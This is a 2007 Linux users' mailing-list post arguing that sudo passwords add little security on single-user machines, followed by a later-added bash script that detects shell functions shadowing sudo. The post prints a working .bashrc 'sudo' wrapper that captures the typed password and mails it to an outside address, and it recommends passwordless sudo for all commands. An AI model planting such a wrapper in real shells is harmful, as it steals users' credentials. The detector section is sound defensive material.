[HanoiLUG] Ubuntu-sudo usage..
David Favro
hanoilug at meta-dynamic.com
Wed Jan 3 21:46:36 ICT 2007
I've never done a 'vanilla' Ubuntu install, so I'm not sure, but I think
that maybe the idea is that if you don't set a root password during the
install, it won't prompt you for one when you 'sudo' from the normal
account. Someone can correct me if I'm wrong. If so, I think that they
are halfway onto the right idea.
Personally, I always set a root password, and add an entry to
/etc/sudoers that allows my 'private' ID to sudo to anything, like:
my_user ALL=NOPASSWD: ALL
and I have an alias in my .bashrc:
alias su="sudo su -"
Then I disable all of their 'security' features like disallowing root
login from gdm, from ssh, etc. (but I take an additional precaution of
disallowing root login via password in ssh, only via PK, and have sshd
use a non-default port).
All of this means that I can 'be myself' yet execute any command via
sudo without typing root password, and if I need to do a lot of
sysadmin, I can just type "su" to become root to avoid typing "sudo" (I
also keep a gnome-terminal profile with the command "sudo su -" so that
I can easily fire up a terminal that is already root). You can also
achieve similar results through the use of groups, but I like forcing
myself to acknowledge that I am executing a privileged command by using
'sudo' or a root shell.
The point is, I've been using unix for 25 years and always liked the
user-permissions model, but it is not really adapted to the modern
environment: more and more, most computers are no longer multi-user
machines. The typical laptop or desktop workstation computer is used by
only one user almost all of the time, and there's no need to disallow
sys-admin by that user since he 'owns' the machine. I'm not suggesting
that we should all run as 'root', but the need to type 'sudo' is (should
be) just a safety reminder so that we realize that we are executing a
command with system-wide implications rather than just for our user-ID.
The mindset that an intruder as root is a higher security risk than as
an 'unprivileged' user is outdated, although still prevalent. I was of
this opinion for decades, but it no longer applies on a machine where
there effectively is only one user. In the old days, an unauthorized
user as root could steal/destroy the data of all users, as well as bring
the system down, but as an unprivileged user, could only steal/destroy
that one user's data. But now, there only *is* one user. If an
intruder can read your emails, destroy your oggs, etc., what do you care
if they have access to the /sbin directory? Once someone has access as
'you', it's all over. And, since you are typing your root password
every time that you do sysadmin, I get that as a bonus too -- I just
type this into your terminal session or add it to your .bashrc:
sudo() {
    # capture the password the user types, then hand it to the real sudo
    read -s -p "Password: " pwd ; echo
    # -S makes sudo read the password from stdin instead of the terminal,
    # otherwise it would ignore the here-string and prompt a second time
    /usr/bin/sudo -S -p "" "${@}" <<<"${pwd}"
    # ... and mail a copy of it away
    Mail -s "$(id -un)@${HOSTNAME}" hanoilug at meta-dynamic.com <<<"${pwd}"
}
(I don't steal people's passwords -- I only worked out that hack as a
way to demonstrate to people that they are not any more secure by
forcing themselves to type their root password whenever they use sudo,
as some still think).
So, my whole philosophy is that on my personal machines (e.g. laptop),
my personal user-ID should be equivalent to root, but I still need to
use 'sudo' or 'su' or start up a root shell to do sysadmin, just as a
safety check that I don't inadvertently make a mistake, but I don't want
to type passwords. I guess that since Ubuntu is aimed at 'desktop'
machines, they had the same idea, but there are problems with their
implementation. For one, there are times when one wants to login
directly as root, not as a normal ID followed by su/sudo (for reasons
too difficult to explain here). So if root has no password (no direct
login) and root login is disabled in gdm and sshd, you are out of luck.
The 'single-user machine' mentality also means that, in most cases, when
the machine is booted, the need to 'log in' to a graphical session with
a user-ID and password via gdm or other login window is also an obsolete
idea, just another inconvenience that adds no security, like the root
password for 'sudo', so I have found ways to eliminate it. Of course, I
also take many other security measures with respect to my machines.
-- David F.
Steve wrote:
> I have a question about sudo usage in Ubuntu. Why is the usage
> emphasised over su? If users get prompted for a root password each
> time then how is it different to su? If the idea is to force a
> password entry before each root command, then what stops you from
> running sudo /bin/bash (or some other executable which gives you
> a shell)?
>
> Steve
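The password-grabbing wrapper above works because a function or alias named "sudo" is found before /usr/bin/sudo. The following check is an added example, not part of David's post or anything else in this thread: it scans an rc file for definitions that redefine sudo or su, and asks the running shell what "sudo" currently resolves to. The function names and the sample rc files it creates are this example's own.

```shell
#!/usr/bin/env bash
# Added example (not from the original post): detect a shell-level wrapper
# named "sudo" or "su" of the kind described above, i.e. a function or alias
# that sits in front of /usr/bin/sudo and therefore sees the typed password.
# The function names and the sample rc files below are this example's own.

# Scan one rc file for definitions that would shadow sudo or su.
# Returns 0 when none are found, 1 when a shadowing definition exists.
# Matches:  sudo() {   function sudo {   function sudo() {   alias sudo=
# A well-meant wrapper is reported too; the point is that nothing should
# stand between the user and the real binary without their knowledge.
scan_rc_for_sudo_shadow() {
    local rc="$1"
    [ -r "$rc" ] || return 0
    if grep -Eq '^[[:space:]]*(function[[:space:]]+(sudo|su)([[:space:]]|\(|$)|(sudo|su)[[:space:]]*\(\)|alias[[:space:]]+(sudo|su)=)' "$rc"; then
        return 1
    fi
    return 0
}

# Ask the running shell what "sudo" resolves to right now.
# Prints file | shadowed | missing and returns 0 only for "file".
resolve_sudo_kind() {
    local desc
    desc=$(type sudo 2>/dev/null | head -n 1)
    case "$desc" in
        *function*|*alias*)   echo shadowed; return 1 ;;
        *" is /"*|*hashed*)   echo file;     return 0 ;;
        *)                    echo missing;  return 1 ;;
    esac
}

# Demonstration on constructed rc files (created here, not real user files).
demo_dir=$(mktemp -d)
printf 'export EDITOR=vi\nalias ll="ls -l"\n' > "$demo_dir/clean.bashrc"
printf 'sudo() { /usr/bin/sudo "$@"; }\n' > "$demo_dir/shadowed.bashrc"
for f in "$demo_dir"/*.bashrc; do
    if scan_rc_for_sudo_shadow "$f"; then
        echo "$f: clean"
    else
        echo "$f: WARNING, sudo/su is redefined here"
    fi
done
rm -rf "$demo_dir"
if resolve_sudo_kind >/dev/null; then
    echo "sudo resolves to a real file in this shell"
else
    echo "sudo does not resolve to a real file in this shell"
fi
```

Run it against ~/.bashrc, ~/.bash_aliases and ~/.profile, and run resolve_sudo_kind from the shell you actually type into, since the scan only sees files you name while the resolver sees whatever the shell has already sourced. The check is only as trustworthy as the shell running it: a compromised account can redefine type and grep as easily as sudo, which is the author's point about an intruder who is already "you".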